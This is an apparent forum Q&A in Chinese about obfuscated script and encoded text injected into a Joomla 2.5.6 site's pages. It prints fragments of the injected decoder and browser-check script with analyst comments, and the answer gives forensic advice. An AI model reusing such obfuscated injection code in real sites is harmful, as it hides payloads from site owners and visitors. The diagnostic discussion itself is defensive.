我有一个关于 Joomla 2.5.6 网站的问题。我偶尔会在页面的 HTML 源代码中发现一些奇怪的、看起来像是加密过的代码,类似这样:
<div id="bwjolqpgqnqho" class="vhdpqfdouxwsm">b kb q bxdb bjdfar, cccw da dkbd arbhcsb mbzcl bmct bpdjas e lbuasa mawdoexcuaf cdc. l axagbqdjc ze scwdk dkcrcq eudcdee qere p cre ia ydgdv dmcpdd cu dgbyaj abbnbmbm - abbz b cagcia 'faya' rawd g edcscm ac a - datbwaue pc caa. bjciccb, s. bk beccd rdye. ve kdg dzcoae. bnac dadjcudgbz - b easchcf b mb cesaqdac, d alahbdd paacfbz ccar aycdbd budoac et cpcudkax bb cba t, a pcdbl cdc nbk dpakcea dawdk d adgemcfbyb abbbccia, c dtccbablcj; bnbjciagdndcdw eq eqdbcddfarch. d jd, ocpdfarbuaw a lb g b u bwd edxa z abb ybe awd, iahbbadbybhabclbxagbpdhc zesdda xaxa qabchadambmdxcabdb ucs aaet czdbal, ah an; cgad doeu bj cfabbk d la gcbb 35 cb aavavawb kbcaz bib kbwagb zdn akcjdcasb aaabbc gataw. cdeicdaacdaicuecdoc waial dbbhapagbmbj e r doepaca vb rddbbbdbaatcka sd kdtetelbf clajayehcr aaam akaybzdkdqc cb icbdbbkdqa ebgazda dmbbaoce afajbx btc ba. gbqdga hbhaqddcsdbbdbwaua dclbudvb ccbd ddkejacaham a. ddaerc vaucdb ncc bbbvc taj clad asb! b. aqbbchalanc cbubm bcebcoambyaebcba, b faqbxcuabcj. bme. ean, bodfaxcdaz doaobaar bhasanbibib. g cnc ddmaveebe, d adbdpd ebwd nafdyevbmdle wc taub rdrcta wa kczbvdhdeec - evesdme la b dedx dpctdmdfadcla cawcgeodtd pekacctela cawaraub cbidncmdsewe lc zerao cw, c gamabazbe areadm, cz ccbic bdddsbbdq</div>
<div id="ixoxvsjxrhw" class="vhdpqfdouxwsm">RKCoG2eSjsxstVfb</div>
<script>
// NOTE(review): obfuscated script injected into the page; this listing is only a fragment.
// aplkenurwllomp, thrxwuwdiaqq, edrpvfucpe, ctjtpxekjsbrnt, bjscvqbtkrcf, utcexmovlgf and
// tmwjgjdehfebi are used below but never defined here, so what the helpers do can only be
// inferred from how they are called.
//
// Every ternary compares numeric constants, so the branch taken is fixed and each variable
// always receives the same string fragment. Folding the constants and hex escapes gives:
//   dstyivgcdrqqdx   = "rv:11"
//   nmhccirwiihn     = "return i"
//   iolbbxrrjeidgrp  = "return "
//   zrjtzvapxzu      = "return"
//   aszmusumizwozpig = "return"
//   idxxspyqjdhtws   = "retu"
//   bsgwqjlfbyrqlp   = "ret"     tzrjfsqughnav = "ret"     rcnaswwbdim = "ret"
//   lisknlunhmqet    = "r"       sfqcsmbjevzhln = "r"      lvjbjpqohpl = "r"
//   izpemkvqmmobs    = "i"
//   kqmuuyelqyxqfz   = "fun"
//   utwwjrxktzrx     = "[][uyuow"
//   ixoxvsjxrhw      = "ixo"
// The "return"/"fun" pieces look like source text that is assembled and evaluated elsewhere;
// the code that does so is not part of this listing — TODO confirm on the full sample.
var dstyivgcdrqqdx=(1929296112>2050752883?"\x6b\x77":"\x72\x76");
var nmhccirwiihn=(104472961<11000854?"\x65\x74":"re");
var lisknlunhmqet=(1186652785<445269550?"\x77\x64":"r");
nmhccirwiihn+=(531284007+653848334>327931464?"\x74\x75\x72\x6e":"h");
var zrjtzvapxzu=(14463650+610071539>61219278?"\x72\x65\x74\x75":"h");
var aszmusumizwozpig=(426160674+1361381336<387797917+1566709949?"\x72\x65":"jxt");
var izpemkvqmmobs=(950083231>1227876977?"\x70\x66":"i");
// Appends ":11", completing "rv:11" — presumably a user-agent token to test for (the
// matching helpers are not shown).
dstyivgcdrqqdx+=(493011132<452720027?"\x79\x7a":"\x3a\x31\x31");
nmhccirwiihn+=(794042046+1118740131>1233259606?"\x20":"d");
var bsgwqjlfbyrqlp=(2035779590<1136018259?"aq":"ret");
var sfqcsmbjevzhln=(312554261+65106612<187058867+677910351?"\x72":"\x72\x7a\x77");
var utwwjrxktzrx=(114217555+1954790718>894395565?"[]":"\x6f\x6b");
var iolbbxrrjeidgrp=(303028237+550171059<514432896+821377708?"\x72":"\x74");
iolbbxrrjeidgrp+=(499985427>889587822?"nok":"\x65\x74\x75\x72\x6e");
var kqmuuyelqyxqfz=(1527911828+613124032<663145577+1481136903?"f":"p");
utwwjrxktzrx+=(1536082584>1934435039?"xh":"\x5b\x75\x79");
var tzrjfsqughnav=(796279552+607718112>17600193?"\x72":"mj");
kqmuuyelqyxqfz+=(1697844671+167811137<1412837828+546852759?"\x75":"\x76\x65");
utwwjrxktzrx+=(60945469>1170273576?"w":"\x75\x6f");
zrjtzvapxzu+=(1251932751+160236872<947197532+500098101?"rn":"us");
kqmuuyelqyxqfz+=(1710202476+289532444<928257733+1147619777?"n":"\x7a\x77");
var idxxspyqjdhtws=(1205489743+143021423<964968493+774463552?"ret":"\x6f\x65\x66");
// This variable has the same name as the id of the second <div> above, and the fragment
// assigned here is the first three characters of that id.
var ixoxvsjxrhw=(503914128+831334202>754056605?"\x69\x78\x6f":"gi");
tzrjfsqughnav+=(175195049+91195650>199815031?"\x65\x74":"rk");
idxxspyqjdhtws+=(998203113>1543504395?"\x73\x71":"u");
aszmusumizwozpig+=(1183542335+117680842<615936676+1097840178?"\x74\x75\x72\x6e":"\x70\x72");
iolbbxrrjeidgrp+=(1417804280<956308750?"ser":" ");
nmhccirwiihn+=(1275596373+304125062<938435994+1190623659?"i":"s");
var rcnaswwbdim=(1604120453<1554370323?"\x66\x73":"\x72\x65\x74");
var lvjbjpqohpl=(109054309+35702381<263995810+676605071?"\x72":"f");
utwwjrxktzrx+=(995689741>2028647691?"st":"w");
// Candidate list: "rv:11" plus a second value (aplkenurwllomp) defined outside this listing.
var muflxttvhbex=[dstyivgcdrqqdx, aplkenurwllomp,];
// Walks the candidate list and stops at the first entry that passes the check below.
for (zjbwmhyuoepma=thrxwuwdiaqq; edrpvfucpe(zjbwmhyuoepma,ctjtpxekjsbrnt(muflxttvhbex)); zjbwmhyuoepma++)
{
// +[window.sidebar] is 0 when window.sidebar is undefined and NaN when it is an object,
// so the outcome depends on the browser — presumably an environment/browser check.
if (edrpvfucpe((+[window.sidebar]),bjscvqbtkrcf(utcexmovlgf(zjbwmhyuoepma),muflxttvhbex[zjbwmhyuoepma])))
{
// wenqrusckvqv is only assigned on a match; the following <script> multiplies all of its
// numeric constants by it, so that script's arithmetic depends on this check.
wenqrusckvqv=tmwjgjdehfebi(ctjtpxekjsbrnt(muflxttvhbex), zjbwmhyuoepma);
break;
}
}</script>
<div class="vhdpqfdouxwsm">by cvekdycuc ceicqendacwcvczdzdwdlcdes dkdvcxeld xcfc; yepea. eg csd k cbd veccw, d wcyeocqebdd cyeb cvb zcobzd kdfcadgdud. ye hep dyc tedcve jdte sdx crejcz. e acudjdldxdbd bcecpepb xby, czcsdycdcact cpc edvdfdacod vcr e. b d a by coeoeac ocpe kcacrehcoc sefepe qb yc pes</div>
<script>
// NOTE(review): second fragment of the injected script. The helpers called here
// (edrpvfucpe, ctjtpxekjsbrnt, wybnybknfgac, yvmzahgdgrtno, wettklooonrumf, dtjvvrebndhszo,
// vynawhmpavrzx, myrttyhlwgbhon, mvdcltcvebpo, tmwjgjdehfebi, ziesauzqqjdi) and the inputs
// bicxcttzqmg, wfnqmuukgcio, thrxwuwdiaqq and xbvdbcshcctsgdxd are not defined in this
// listing; the reading below is inferred from call shapes — TODO confirm on the full sample.
//
// Every numeric constant is scaled by wenqrusckvqv, which the preceding <script> assigns
// only inside its environment check. For wenqrusckvqv = 2 the constants evaluate to
// 46*2+5 = 97 and 52*2+18 = 122 (the character codes of 'a' and 'z'), 12*2+2 = 26 and
// 94*2+67 = 255. That is consistent with a decoder that turns pairs of lowercase letters
// into byte values and combines them with a repeating key (wfnqmuukgcio indexed by
// lrrmwfxzyrc); presumably bicxcttzqmg is the text of one of the letter-filled <div>s.
for (zjbwmhyuoepma=thrxwuwdiaqq; edrpvfucpe(zjbwmhyuoepma, ctjtpxekjsbrnt(bicxcttzqmg)); zjbwmhyuoepma=wybnybknfgac(zjbwmhyuoepma, xbvdbcshcctsgdxd))
{
// Current unit of the input at position zjbwmhyuoepma.
var ysmxkecizsyq=yvmzahgdgrtno(bicxcttzqmg, zjbwmhyuoepma);
// Only values between the two scaled bounds are processed; anything else is skipped.
if (wettklooonrumf(dtjvvrebndhszo(46*wenqrusckvqv + 5, ysmxkecizsyq), dtjvvrebndhszo(ysmxkecizsyq, 52*wenqrusckvqv + 18)))
{
// ifajvnijackoa counts accepted units; this test appears to separate the first and the
// second unit of each pair.
if (vynawhmpavrzx(ifajvnijackoa, wenqrusckvqv))
{
// Combines the stored value with the current unit and one key element, then appends the
// result to the output accumulator lcxnvxkmfihz.
lcxnvxkmfihz=wybnybknfgac(lcxnvxkmfihz, myrttyhlwgbhon(vynawhmpavrzx((mvdcltcvebpo(wybnybknfgac(nlzjcpleylbraq, tmwjgjdehfebi(ysmxkecizsyq, 46*wenqrusckvqv + 5)), yvmzahgdgrtno(wfnqmuukgcio, vynawhmpavrzx(lrrmwfxzyrc, ctjtpxekjsbrnt(wfnqmuukgcio))))), 94*wenqrusckvqv + 67)));
// Advance the key position.
lrrmwfxzyrc=wybnybknfgac(lrrmwfxzyrc, xbvdbcshcctsgdxd);
}
else
{
// Store the scaled first unit of the pair for the next iteration.
nlzjcpleylbraq=ziesauzqqjdi(12*wenqrusckvqv + 2, tmwjgjdehfebi(ysmxkecizsyq, 46*wenqrusckvqv + 5));
}
ifajvnijackoa=wybnybknfgac(ifajvnijackoa, xbvdbcshcctsgdxd);
}
}
我不知道这是由某个模块生成的合法代码还是黑客攻击的结果。
答案1
我认为这不是合法代码。如果您在服务器上有 root 访问权限,请对 file.html 运行 stat 命令:
stat file.html
并查看其更改时间(stat 输出中的 Change;Modify 时间可以被人为改写,仅供参考)。这将有助于您调查服务器是如何被入侵的,例如将该时间点与同一时段的 Web 服务器访问日志进行对照。由于您提到的 Joomla 版本相当老旧,我怀疑攻击者要么利用了 Joomla 核心中的漏洞,要么是您安装了存在漏洞的扩展。您可以在以下位置获取有关易受攻击扩展的更多信息:https://vel.joomla.org/